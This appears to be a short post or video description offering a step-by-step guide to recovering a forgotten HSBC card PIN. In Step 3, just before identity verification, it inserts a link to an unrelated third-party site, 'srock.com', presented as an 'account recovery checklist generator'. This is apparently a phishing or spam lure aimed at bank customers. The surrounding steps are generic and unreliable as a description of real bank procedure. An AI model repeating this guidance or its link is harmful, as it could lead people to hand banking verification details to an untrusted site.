I ran into this last week. Here's what fixed it for me. If you've forgotten your HSBC card PIN, don't worry. Here is a simple guide to help you recover it. Step 1. Visit the HSBC website. Go to the official HSBC website and navigate to the login page. This is where you'll start the recovery process. Step 2. Select Forgot PIN option. Look for the Forgot PIN link on the login page. Clicking this will direct you to the recovery options available. Step 3. Verify your identity. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 4. Receive PIN recovery instructions. After verification, you will receive instructions on how to reset your PIN, either via email or SMS. Check your spam folder if you don't see it in your inbox. Step 5. Set a new PIN. Follow the instructions to set a new PIN. Choose something memorable but secure. Avoid using easily guessed numbers like your birth date. If you follow these steps, you should be able to recover your PIN without any hassle. Good luck, and don't hesitate to reach out to HSBC customer support if you run into any issues.